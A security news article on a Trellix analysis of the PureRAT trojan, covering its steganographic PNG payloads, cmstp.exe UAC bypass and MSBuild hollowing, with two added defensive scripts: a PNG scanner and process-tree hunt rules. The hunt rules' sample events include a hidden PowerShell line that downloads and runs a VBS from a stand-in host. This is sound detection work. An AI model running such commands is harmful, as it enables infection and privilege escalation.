Infection chain | Image: Trellix
The Trellix Advanced Research Center has released an in-depth analysis of PureRAT, a remote access trojan (RAT) that uses a multi-stage infection chain to evade detection and establish a persistent foothold on victim systems. Because it relies on fileless, in-memory delivery and hides its payloads with steganography, the researchers describe PureRAT as a "versatile dynamic loader" rather than a traditional, bulky malware package.
The intrusion begins with a malicious Windows shortcut (.LNK) file that, when opened, runs a hidden PowerShell command to download a heavily obfuscated VBS loader.
One of the most notable features of the PureRAT infection chain is its reliance on steganography to bypass signature-based security tools.
Malicious portable executable (PE) files are hidden inside legitimate-looking PNG images, such as Oxptimized_MSI.png and GeneratedPay.png. A PowerShell script reads the embedded payload from known byte offsets within the image, decodes it, and loads it directly into memory, so no standalone PE file is ever written to disk for a file scanner to inspect.
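The image-carrier technique described above is exactly the kind of thing a responder wants to triage quickly. The following scanner is an added example written for this page, not Trellix's tooling or code from the campaign: it walks a PNG's chunk list, reports any bytes appended after the IEND chunk (the simplest PE-in-PNG polyglot), and searches both the raw trailer and the decompressed IDAT pixel stream for an MZ header whose e_lfanew points at a valid "PE\0\0" signature. The PNG and the PE-shaped stub it scans are constructed inline; the campaign's real offsets and encoding are not reproduced here.

```python
"""Scan a PNG for an embedded PE: appended after IEND, or stored as pixel data in IDAT."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, body: bytes) -> bytes:
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_png(pixels: bytes = b"\x00", trailer: bytes = b"") -> bytes:
    """Constructed sample: one-row 8-bit grayscale PNG whose pixel bytes are `pixels`;
    `trailer` is appended after IEND to mimic a polyglot. Not a sample from the campaign."""
    ihdr = struct.pack(">IIBBBBB", len(pixels), 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00" + pixels)  # filter type 0, then the single row
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"") + trailer


def fake_pe() -> bytes:
    """Constructed PE-shaped stub: 'MZ', e_lfanew at 0x3c pointing to 'PE\\0\\0'. Not runnable."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    return bytes(dos) + b"PE\x00\x00" + bytes(0x20)


def find_pe_headers(blob: bytes) -> list:
    """Offsets of 'MZ' headers whose e_lfanew field points at a 'PE\\0\\0' signature."""
    hits, pos = [], blob.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(blob):
            e_lfanew = struct.unpack_from("<I", blob, pos + 0x3C)[0]
            nt = pos + e_lfanew
            if 0x40 <= e_lfanew < 0x1000 and blob[nt:nt + 4] == b"PE\x00\x00":
                hits.append(pos)
        pos = blob.find(b"MZ", pos + 1)
    return hits


def parse_png(data: bytes):
    """Walk the chunk list; return (chunks, end_offset) where end_offset is the byte after IEND."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    chunks, off = [], len(PNG_SIG)
    while off + 12 <= len(data):
        length, ctype = struct.unpack_from(">I4s", data, off)
        if off + 12 + length > len(data):
            break  # truncated chunk; stop rather than read past the buffer
        body = data[off + 8:off + 8 + length]
        crc = struct.unpack_from(">I", data, off + 8 + length)[0]
        chunks.append((ctype, body, crc == (zlib.crc32(ctype + body) & 0xFFFFFFFF)))
        off += 12 + length
        if ctype == b"IEND":
            break
    return chunks, off


def scan_png(data: bytes) -> dict:
    """Triage summary: trailer size, CRC failures, and PE headers found after IEND or in pixels."""
    chunks, end = parse_png(data)
    trailer = data[end:]
    idat = b"".join(body for ctype, body, _ in chunks if ctype == b"IDAT")
    try:
        pixels = zlib.decompress(idat)  # raw scanlines, each prefixed by a filter byte
    except zlib.error:
        pixels = b""
    return {
        "trailing_bytes": len(trailer),
        "bad_crc": [c.decode("latin-1") for c, _, ok in chunks if not ok],
        "pe_after_iend": [end + o for o in find_pe_headers(trailer)],
        "pe_in_pixels": find_pe_headers(pixels),
    }


if __name__ == "__main__":
    for label, sample in (("appended", build_png(trailer=fake_pe())),
                          ("in pixels", build_png(pixels=fake_pe()))):
        print(label, scan_png(sample))
```

A hit in `pe_in_pixels` lands at offset 1 for the constructed image because the decompressed stream carries a filter byte before each row; a real carrier would also need the PNG unfiltered before the offsets mean anything, which is why the loader's own "known index" approach is simpler for the attacker than it is for the analyst. Scanning the raw file alone would miss the pixel-embedded case entirely, since the payload is inside the zlib stream.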
The initial implant is intentionally minimal to maintain a stealthy profile. Trellix researchers explain:
“Rather than deploying a bulky, feature-complete executable that might be easily flagged by signature-based detection, the initial implant remains dormant, maintaining a minimal footprint on the infected system.”
This implant waits for a command-and-control (C2) operator to push specific modules on demand. These modules can include:
- Environmental Monitoring: Unauthorized access to microphones and webcams.
- Credential Harvesting: Real-time keylogging to steal sensitive logins.
- Remote Desktop Access: Establishing hidden connections to bypass security controls and interact directly with the victim’s environment.
To run reliably on modern Windows systems while staying hidden, PureRAT combines several "anti-forensic" tactics (in MITRE ATT&CK terms, privilege escalation and defense evasion):
- UAC Bypass: The malware abuses cmstp.exe, a Microsoft-signed Windows binary that is marked to auto-elevate. Because of that trust, it "automatically achieves high integrity without triggering a UAC prompt".
- Process Hollowing: A legitimate process, specifically MSBuild.exe, is started in a suspended state and its in-memory image is replaced with the malicious payload before execution resumes. The binary on disk remains a "signed, legitimate Windows file", so file-based checks see nothing wrong.
- Anti-VM Checks: The malware checks the environment for VMware and QEMU (specifically looking for the MAC address 52:54:00:44:04:AF; the 52:54:00 prefix is the default OUI used by QEMU/KVM virtual NICs) to detect and evade virtualized analysis environments.
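The LNK-to-PowerShell-to-VBS chain, the cmstp.exe auto-elevation and the MSBuild.exe hollowing described above all leave a process-tree signature even when the files involved are signed and the payload never touches disk. The rules below are an added example written for this page, not Trellix's detections: they run over a handful of constructed process-creation events shaped like Sysmon Event ID 1 (image, parent image, command line, integrity level) and flag the lineage and argument patterns a hunter would look for. The hostname `example.invalid` and all paths and PIDs are made up; the anti-VM MAC check is not covered because it is not visible in process telemetry.

```python
"""Process-lineage hunt rules for the LNK > PowerShell > VBS > cmstp.exe > MSBuild.exe chain."""
import ntpath
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmstp.exe"}
AUTO_ELEVATE = {"cmstp.exe"}  # auto-elevating Microsoft binaries known for UAC bypass; extend as needed
USER_WRITABLE = re.compile(r"\\(users|programdata|temp|tmp|public)\\", re.I)
PROJECT_ARG = re.compile(r"\.(sln|csproj|vbproj|proj|targets|props)\b", re.I)
INF_ARG = re.compile(r"(\S+\.inf)\b", re.I)
HIDDEN_PS = re.compile(r"-(w(indowstyle)?\s+hidden|e(nc(odedcommand)?)?(\s|$))", re.I)
INTEGRITY_RANK = {"Low": 0, "Medium": 1, "High": 2, "System": 3}

# Constructed sample events (not real telemetry). PIDs 4100-4400 are the malicious chain,
# 5000 and 5100 are benign uses of MSBuild.exe and cmstp.exe that must not fire.
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 1204, "integrity": "Medium",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'powershell.exe -w hidden -nop -c "iwr http://example.invalid/l.vbs -OutFile $env:TEMP\l.vbs; wscript $env:TEMP\l.vbs"'},
    {"pid": 4188, "ppid": 4100, "integrity": "Medium",
     "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"wscript C:\Users\victim\AppData\Local\Temp\l.vbs"},
    {"pid": 4320, "ppid": 4188, "integrity": "Medium",
     "image": r"C:\Windows\System32\cmstp.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"cmstp.exe /ni /s C:\Users\Public\setup.inf"},
    {"pid": 4400, "ppid": 4320, "integrity": "High",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "parent": r"C:\Windows\System32\cmstp.exe",
     "cmdline": r"MSBuild.exe"},
    {"pid": 5000, "ppid": 900, "integrity": "Medium",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "parent": r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe",
     "cmdline": r"MSBuild.exe /t:Build C:\src\app\app.csproj"},
    {"pid": 5100, "ppid": 910, "integrity": "Medium",
     "image": r"C:\Windows\System32\cmstp.exe",
     "parent": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'cmstp.exe /s "C:\Program Files\Corp\CorpVPN.inf"'},
]


def base(path: str) -> str:
    return ntpath.basename(path).lower()


def evaluate(events: list) -> dict:
    """Return {pid: [rule names]} for every event that matches at least one rule."""
    by_pid = {e["pid"]: e for e in events}
    hits = {}

    def flag(e, rule):
        hits.setdefault(e["pid"], []).append(rule)

    for e in events:
        img, parent, cmd = base(e["image"]), base(e["parent"]), e["cmdline"]
        par = by_pid.get(e["ppid"])
        # Stage 1: LNK double-click shows up as explorer.exe spawning a hidden/encoded PowerShell.
        if img in ("powershell.exe", "pwsh.exe") and parent == "explorer.exe" and HIDDEN_PS.search(cmd):
            flag(e, "hidden_powershell_from_explorer")
        # Stage 2: the VBS loader runs under wscript/cscript launched by PowerShell.
        if img in ("wscript.exe", "cscript.exe") and parent in ("powershell.exe", "pwsh.exe"):
            flag(e, "script_host_spawned_by_powershell")
        # Stage 3: cmstp.exe fed an INF from a user-writable directory (legit profiles live under Program Files).
        if img == "cmstp.exe":
            m = INF_ARG.search(cmd)
            if m and USER_WRITABLE.search(m.group(1)):
                flag(e, "cmstp_inf_from_user_writable_path")
        # Stage 4: any child of an auto-elevating binary is suspect; a Medium->High jump confirms the bypass.
        if parent in AUTO_ELEVATE:
            flag(e, "child_of_auto_elevate_binary")
            if par and INTEGRITY_RANK.get(e["integrity"], 0) > INTEGRITY_RANK.get(par["integrity"], 0):
                flag(e, "integrity_jump_without_consent")
        # Stage 5: MSBuild.exe with no project file, or started by a script host, is a hollowing candidate.
        if img == "msbuild.exe" and (parent in SCRIPT_HOSTS or not PROJECT_ARG.search(cmd)):
            flag(e, "msbuild_without_project_or_from_script_host")
    return hits


if __name__ == "__main__":
    for pid, rules in sorted(evaluate(SAMPLE_EVENTS).items()):
        print(pid, ", ".join(rules))
```

The integrity comparison is the rule worth keeping even if the others are tuned away: a child process at High integrity whose parent ran at Medium, with no consent.exe in between, is the observable side effect of every auto-elevate UAC bypass, not just the cmstp.exe variant.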
Once fully deployed, the final PureRAT payload performs extensive host fingerprinting. It queries the system to identify installed security products, hardware serial numbers, user privileges, and even searches for desktop and browser-based cryptocurrency wallets.
Finally, the malware enters a persistent tasking loop, acting as a “continuous listener ready to process incoming instructions” from its C2 server, currently linked to the hostname instantservices1[.]ddnsguru[.]com.
PureRAT’s modular architecture allows it to evolve far beyond its initial reconnaissance phase. By leveraging legitimate system processes and hiding its payload in image files, it remains a difficult-to-detect threat for both individual users and corporate environments. Trellix researchers warn that this methodology “substantially aids the malware in evading detection, unlike conventional file infectors”.